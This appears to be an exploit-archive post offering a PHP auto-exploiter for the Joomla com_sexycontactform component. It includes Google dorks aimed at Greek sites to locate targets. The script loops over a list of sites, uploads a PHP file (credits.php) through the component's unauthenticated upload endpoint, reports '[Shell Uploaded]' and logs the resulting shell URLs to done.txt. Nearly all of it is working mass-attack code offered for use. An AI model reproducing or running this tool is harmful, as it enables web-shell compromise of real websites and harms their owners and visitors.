Title: Joomla com_sexycontactform auto-exploiter

1. Title: Joomla com_sexycontactform auto-exploiter
2.  
3.  
4.  
5. Author: Kyfx
6.  
7.  
8.  
9.  
10.  
11.  
12. Google Dork: "/components/com_sexycontactform/" site:gr
13.  
14. Google Dork: "Powered by sexycontact" site:gr
15.  
16. Google Dork: inurl:"sexy-contact-form" site:gr
17.  
18.  
19.  
20. Source code:
21.  
22.  
23.  
24. <?php
25.  
26. function banner(){
27.  
28. echo "========= SexyContactForm Auto Exploiter ==============\n\n";
29.  
30. echo "Coded By : KkK1337\n\n";
31.  
32. echo "========== Done =============\n\n";
33.  
34. }
35.  
36. banner();
37.  
38. $url=file($argv[1]);
39.  
40. foreach ($url as $sites){
41.  
42. $sites=trim($sites);
43.  
44. $pro="credits.php";
45.  
46. $upload="$sites/components/com_sexycontactform/fileupload/files/$pro";
47.  
48. $ch = curl_init ();
49.  
50. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
51.  
52. curl_setopt ($ch, CURLOPT_POST, 1);
53.  
54. curl_setopt ($ch, CURLOPT_URL, "$sites/components/com_sexycontactform/fileupload/index.php");
55.  
56. @curl_setopt ($ch, CURLOPT_POSTFIELDS, array ("files[]" => "@".$pro));
57.  
58. curl_exec($ch);
59.  
60. if (preg_match ("/credits.php/i", @file_get_contents("$sites/components/com_sexycontactform/fileupload/index.php")))
61.  
62. {
63.  
64. echo "[Shell Uploaded] => $sites\n";
65.  
66. $ux = "".$upload."\r\n"; $save=fopen('done.txt','ab'); fwrite($save,"$ux");
67.  
68. }
69.  
70. else{
71.  
72. echo "[ERROR] => $sites\n";
73.  
74. }
75.  
76. }
77.  
78. ?>